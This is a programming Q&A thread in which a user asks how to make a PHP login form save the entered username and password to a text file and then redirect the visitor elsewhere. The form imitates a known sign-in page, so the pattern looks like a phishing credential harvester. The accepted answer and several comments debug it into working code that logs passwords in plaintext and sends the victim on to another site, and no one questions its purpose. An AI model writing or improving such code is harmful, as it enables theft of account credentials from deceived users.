# PHP save form input and redirect

Tags: php, html

I want to redirect and save the form input into a textfile when you click on the submit button. Without the form action the php works, but with it only the space is written in the textfile. I've also tried to redirect with javascript but it didn't work.

```
<form action="https://www.google.com/" method="POST" name="logon" id="loginForm">

    <input class="textField" type="text" name="username" id="AccountName" autofocus="" maxlength="64">

    <input class="textField" type="password" name="password" id="AccountPassword" autocomplete="off" maxlength="64">

    <div id="login_btn_signin">

    <input class="btn_green_white_innerfade" type="submit"  name="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;"   value="Sign in">

</form>
<?php

    // Open the text file
    $f = fopen("textfile.txt", "w");

    // Write text
    fwrite($f, $_POST["username"]);
    fwrite($f, " ");
    fwrite($f, $_POST["password"]); 

    // Close the text file
    fclose($f);

?>
```

Comment: So the reason it's not working with the action is because you are telling the form to look at google.com to handle the form. If you want the same page to handle the form, put that page's name in the action, such as index.php. The reason you are getting a blank fwrite is because the data isn't available yet. You have to check if the form is submitted, something like isset($_POST['submit']) then you will know that data is available.

Comment: @KyleHawk Do you want to write an answer so I can mark it as correct so you get more reputation and maybe you can be a little bit more specific with how to use  isset($_POST['submit']) ?

Comment: See Kamil's answer for how to use the if statement. However, I prefer writing it this way if(isset($_POST['submit'])) { //do stuff }. I'm not concerned with rep so don't worry about it :)

What the isset if statement does is check to see if the submit index is set in the POST array. So it literally is checking to see if it exists, if it does, then it returns true. Make sense?

Comment: @KyleHawk Yes, but also, what do you mean that the google link in action is wrong, what is the correct way to redirect on submit?

Comment: @KyleHawk Where'd you go? :)

Comment: `action="https://www.google.com/"` Do you work for GOOGLE if not then you dont want to be sending this data to their index script

Comment: @RiggsFolly what shall I do to redirect to google after the form is submitted without sending the form information to them then?

Comment: See the [`header('Location: https://google.com/some_script.php')` call in the PHP Manual](http://php.net/manual/en/function.header.php)

Comment: @RiggsFolly Just looked at that, it doesnt work, does the php need to be before the doctype tag?

Comment: Any call to the header function MUST come before any and all HTML as per the answer below.

Answer (score 1, accepted):

You need to set the `action` to the url of the page.  Right now you are sending your form data to Google.com

```
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST')
{
    // Open the text file
    $f = fopen("textfile.txt", "w");

    // Write text
    fwrite($f, $_POST["username"]);
    fwrite($f, " ");
    fwrite($f, $_POST["password"]); 

    // Close the text file
    fclose($f);

    header('location: {URL TO REDIRECT TO}');
}

?>
<form action="{URL OF THIS PAGE}" method="POST" name="logon" id="loginForm">

    <input class="textField" type="text" name="username" id="AccountName" autofocus="" maxlength="64">

    <input class="textField" type="password" name="password" id="AccountPassword" autocomplete="off" maxlength="64">

    <div id="login_btn_signin">

    <input class="btn_green_white_innerfade" type="submit"  name="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;"   value="Sign in">

</form>
```

Comment: But how do I redirect then?

Comment: Or just leave it blank `<form action="" method="POST" name="logon" id="loginForm">` to make it run the script you wrote

Comment: leaving the action blank works, but doesn't comply with the HTML spec.

Comment: @RiggsFolly But what do I write to redirect then?

Comment: Where do you think you want to send the Userid and Password. To your script or to google

Comment: if you move the PHP to the beginning of the file, you can use PHP's `header()` function to redirect.  Modifying my answer to include this.

Answer (score -2):

When you lunch the script, everytime it does that:

```
// show html
// ERASE TEXT IN FILE
```

You should use if(), for example:

```
<form action="https://www.google.com/" method="POST" name="logon" id="loginForm">

    <input class="textField" type="text" name="username" id="AccountName" autofocus="" maxlength="64">

    <input class="textField" type="password" name="password" id="AccountPassword" autocomplete="off" maxlength="64">

    <div id="login_btn_signin">

    <input class="btn_green_white_innerfade" type="submit"  name="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;"   value="Sign in">

</form>
<?php
    if($_POST['submit'] != '') // here it is
    {
    // Open the text file
    $f = fopen("textfile.txt", "w");

    // Write text
    fwrite($f, $_POST["username"]);
    fwrite($f, " ");
    fwrite($f, $_POST["password"]); 

    // Close the text file
    fclose($f);
    }

?>
```

Comment: if ($_SERVER['REQUEST_METHOD'] == 'POST') or isset are preferred methods of checking if the form was submitted. Also, please remove the action to Google in your answer, as that is incorrect.

Comment: The textfile still didn't write the username and password down